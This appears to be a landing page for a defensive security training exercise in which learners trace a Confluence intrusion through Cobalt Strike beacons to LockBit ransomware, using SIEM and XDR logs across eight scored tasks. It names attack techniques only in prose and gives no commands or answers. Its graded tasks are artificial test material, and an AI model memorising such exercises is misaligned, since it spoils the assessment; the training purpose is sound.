Cobalt Strike: Beacon Detection
Analyze a sophisticated intrusion involving the exploitation of an Atlassian Confluence server, leading to Cobalt Strike beacon deployment and LockBit ransomware. This scenario focuses on identifying malleable C2 profiles, process injection into legitimate Windows processes, and the use of SOCKS proxies for lateral movement. You will navigate through SIEM logs and XDR process trees to reconstruct the attack timeline from initial access to final impact.
Start this operation
Create your free account and begin immediately.
Get Early Access — FreeFree forever — no credit card required
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Identifying Malicious Scripting Behavior
50An alert was triggered on wkstn-05 involving the user jdoe, suggesting the execution of an encoded command-line script. You must investigate the telemetry to determine how the attacker leveraged native scripting interpreters to gain further access.
Identifying the Compromised Service Account
15An unusual execution chain was detected on the confluence-srv host around 2025-04-10T14:25:29.697Z. You need to determine which service account was utilized to run these commands to assess the scope of the account compromise.
Identifying the Malicious Scripting Engine
50An alert was triggered indicating a suspicious process spawned from a browser on wkstn-05. You need to investigate the SIEM logs to determine which process was used to execute the obfuscated script that initiated the connection to the external C2 server.
Identify Suspicious Command and Control Infrastructure
15An alert was triggered indicating a possible data exfiltration attempt from our internal network. Analyze the XDR timeline to determine which internal endpoint or domain was being targeted during the peak of the suspicious activity.
Identifying the Incident Log Origin
35An unusual outbound connection was flagged coming from the confluence-srv host during a potential data exfiltration attempt. You need to determine which architectural component or log source was responsible for reporting this specific activity to our central monitoring system.
Investigate Post-Exploitation Discovery Commands
50After gaining initial access to wkstn-05, the threat actor began performing local reconnaissance to identify the current user context. Analyze the SIEM logs for this workstation to determine which native Windows binary was invoked to verify their privileges.
Identifying Successful Authentication Patterns
50At 2025-04-10T08:15:00.958Z, an unusual volume of authentication activity was observed originating from wkstn-05. You need to determine the exact event identifier that confirms a successful session was established on the domain controller to map out the attacker's lateral movement.
Identifying the Initial Vector on confluence-srv
50An alert was triggered on the confluence-srv host involving the service account confluence_svc. You need to determine how the attacker first gained a foothold by reviewing the automated mapping of the detected activity to the MITRE ATT&CK framework within the XDR telemetry.
8 tasks · 315 points total
Start investigationTraining Tools
Skills You'll Build
Requires foundational alert triage skills. Multiple data sources to correlate.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
Ready to investigate?
Create your free account and begin immediately.
Get Early Access — FreeFree forever — no credit card required
More Operations
View allClickFix: The Fake CAPTCHA Trap
Investigate a modern 'ClickFix' social engineering attack where a user was tricked into executing a malicious PowerShell command via a fake CAPTCHA interface. You will analyze SIEM and XDR telemetry to trace the infection from the initial web lure to the deployment of an infostealer.
Phishing Investigation: ZipLine Supply Chain Campaign
Investigate a sophisticated social engineering campaign targeting manufacturing supply chains. You will analyze a 'reversed' phishing flow where attackers use 'Contact Us' forms to trick employees into initiating email conversations, leading to the deployment of the custom MixShell in-memory implant via DNS tunneling.
Credential Harvesting: The Lookalike Login
An investigation into a modern phishing campaign targeting critical infrastructure. You will analyze email headers for domain spoofing, identify 'Paste and Run' execution chains, and track the delivery of the LummaC2 information stealer through SIEM logs.